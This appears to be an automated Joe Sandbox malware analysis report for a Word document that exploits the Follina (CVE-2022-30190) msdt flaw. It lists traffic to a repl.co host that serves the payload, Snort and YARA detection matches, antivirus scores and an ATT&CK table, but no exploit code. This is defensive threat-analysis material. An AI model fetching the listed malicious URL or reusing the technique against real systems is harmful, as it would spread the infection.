      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443

      Networking

      barindex
      Source: TrafficSnort IDS: 2025010 ET TROJAN Powershell commands sent B64 1 35.186.245.55:443 -> 192.168.2.22:49176
      Source: TrafficSnort IDS: 2025010 ET TROJAN Powershell commands sent B64 1 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: dullghostwhitetwintext.karewen.repl.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: dullghostwhitetwintext.karewen.repl.coConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknownHTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49180 version: TLS 1.0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 207Content-Type: text/html; charset=utf-8Date: Thu, 18 Aug 2022 02:23:07 GMTExpect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"Replit-Cluster: globalServer: Werkzeug/2.1.2 Python/3.8.12Strict-Transport-Security: max-age=7758095; includeSubDomainsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 207Content-Type: text/html; charset=utf-8Date: Thu, 18 Aug 2022 02:23:24 GMTExpect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"Replit-Cluster: globalServer: Werkzeug/2.1.2 Python/3.8.12Strict-Transport-Security: max-age=7758077; includeSubDomainsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 207Content-Type: text/html; charset=utf-8Date: Thu, 18 Aug 2022 02:23:27 GMTExpect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"Replit-Cluster: globalServer: Werkzeug/2.1.2 Python/3.8.12Strict-Transport-Security: max-age=7758074; includeSubDomainsConnection: close
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.dr, ~WRS{D894BCB6-25AA-45DC-81E3-B0273BF56D57}.tmp.0.drString found in binary or memory: https://dullghostwhitetwintext.karewen.repl.co/index.html
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.drString found in binary or memory: https://dullghostwhitetwintext.karewen.repl.co/index.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92861601-980D-49B7-B60E-86BDABC4A51A}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: dullghostwhitetwintext.karewen.repl.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: dullghostwhitetwintext.karewen.repl.coConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 35.186.245.55:443 -> 192.168.2.22:49173 version: TLS 1.2

      System Summary

      barindex
      Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C1ZGt61uGv.docxVirustotal: Detection: 45%
      Source: C1ZGt61uGv.docxMetadefender: Detection: 25%
      Source: C1ZGt61uGv.docxReversingLabs: Detection: 35%
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C1ZGt61uGv.LNK.0.drLNK file: ..\..\..\..\..\Desktop\C1ZGt61uGv.docx
      Source: C1ZGt61uGv.docxOLE indicator, Word Document stream: true
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ZGt61uGv.docxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6279.tmpJump to behavior
      Source: classification engineClassification label: mal96.expl.evad.winDOCX@1/20@7/2
      Source: C1ZGt61uGv.docxOLE document summary: title field not present or empty
      Source: C1ZGt61uGv.docxOLE document summary: edited time not present or 0
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: C1ZGt61uGv.docxInitial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Source: document.xml.relsExtracted files from sample: https://dullghostwhitetwintext.karewen.repl.co/index.html!
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts13
      Exploitation for Client Execution
      Path InterceptionPath Interception1
      Masquerading
      OS Credential Dumping1
      File and Directory Discovery
      Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
      System Information Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
      Non-Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
      Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer4
      Ingress Tool Transfer
      SIM Card SwapCarrier Billing Fraud
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      C1ZGt61uGv.docx46%VirustotalBrowse
      C1ZGt61uGv.docx26%MetadefenderBrowse
      C1ZGt61uGv.docx35%ReversingLabsDocument-Word.Trojan.Minerva
      C1ZGt61uGv.docx100%AviraW97M/Dldr.Agent.G1
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm100%AviraJS/CVE-2022-30190.G
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      dullghostwhitetwintext.karewen.repl.co
      35.186.245.55
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://dullghostwhitetwintext.karewen.repl.co/index.htmlfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://dullghostwhitetwintext.karewen.repl.co/index.htmlyX~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp.0.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            35.186.245.55
            dullghostwhitetwintext.karewen.repl.coUnited States
            15169GOOGLEUSfalse
            34.149.204.188
            unknownUnited States
            2686ATGS-MMD-ASUSfalse
            Joe Sandbox Version:35.0.0 Citrine
            Analysis ID:686026
            Start date and time:2022-08-18 04:22:09 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 9s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:C1ZGt61uGv (renamed file extension from none to docx)
